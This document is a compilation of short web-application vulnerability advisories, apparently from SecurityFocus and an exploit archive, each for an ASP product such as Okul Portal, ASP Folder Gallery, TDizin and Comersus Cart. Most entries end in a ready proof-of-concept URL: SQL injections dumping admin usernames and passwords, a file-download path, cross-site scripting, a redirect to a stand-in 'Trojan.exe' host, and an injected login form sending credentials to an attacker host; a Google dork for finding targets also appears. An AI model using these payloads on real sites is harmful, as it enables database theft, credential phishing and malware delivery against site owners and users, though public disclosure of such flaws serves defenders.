source: http://www.securityfocus.com/bid/24288/info

Hünkaray Okul Portalý is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

An attacker can exploit this issue by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.

Hünkaray Okul Portalý 1.1 is vulnerable to this issue.

http://www.example.com/okul/haberoku.asp?id=11%20union+select+0,sifre,kullaniciadi,3,4+from+admin

source: http://www.securityfocus.com/bid/24345/info

ASP Folder Gallery is prone to an arbitrary-file-download vulnerability because the application fails to sufficiently sanitize user-supplied input.

An attacker can exploit this issue to download arbitrary files within the context of the affected webserver.

http://www.example.com/aspfoldergallery/download_script.asp?file=viewimage.asp

source: http://www.securityfocus.com/bid/24379/info

Ibrahim �?AKICI Okul Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

An attacker can exploit this issue by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.

Ibrahim �?AKICI Okul Portal 2.0 is vulnerable to this issue.

http://www.example.com/haber_oku.asp?id=9%20union+select+0,sifre,kulladi,3,4,5,6+from+uyeler

#********************************************************************************

# Exploit Title : Webnet Studio Sql Injection Vulnerability

#

# Exploit Author : Ashiyane Digital Security Team

#

# Vendor Homepage : http://www.webnetstudio.it

#

# Google Dork : intext:"powered by Webnet Studio"

#

# Date: 2013-12-10

#

# Tested on: Windows 7 , Linux

#

# discovered by : ACC3SS

-------------------------------------------------------------------

# Exploit : Sql Injection

#

# Location : [Target]/content.asp?ID=[Sql Injection]

#

######################

source: http://www.securityfocus.com/bid/24515/info

TDizin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

Exploiting this vulnerability may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.

http://www.example.com/TDizin/arama.asp?ara= "><script>alert("G3");</script>&submit=+T%27ARA+

source: http://www.securityfocus.com/bid/24562/info

Comersus Cart is affected by multiple input validation vulnerabilities.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

The attacker may also leverage this issue to execute arbitrary code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Comersus Cart 7.0.7 is vulnerable; other versions may also be affected.

http://www.example.com/store/comersus_optReviewReadExec.asp?idProduct='

source: http://www.securityfocus.com/bid/24562/info

Comersus Cart is affected by multiple input validation vulnerabilities.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

The attacker may also leverage this issue to execute arbitrary code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Comersus Cart 7.0.7 is vulnerable; other versions may also be affected.

http://www.example.com/path/store/comersus_customerAuthenticateForm.asp?redirectUrl="><script>window.location="http://www.Evil_Site.com/Trojan.exe"</script>

source: http://www.securityfocus.com/bid/24562/info

Comersus Cart is affected by multiple input validation vulnerabilities.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

The attacker may also leverage this issue to execute arbitrary code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Comersus Cart 7.0.7 is vulnerable; other versions may also be affected.

http://www.example.com/path/store/comersus_message.asp?message=<script src=http://www.Site.com/Evil_Script.js></script> http://www.example.com/path/store/comersus_message.asp?message=<form%20action="http://www.Evil_Site.com/Steal_Info.asp"%20method="post">Username:<input%20name="username"%20type="text"%20maxlength="10"><br>Password:<input%20name="password"%2 0type="text"%20maxlength="10"><br><input%20name="login"%20type="submit"%20value ="Login"></form>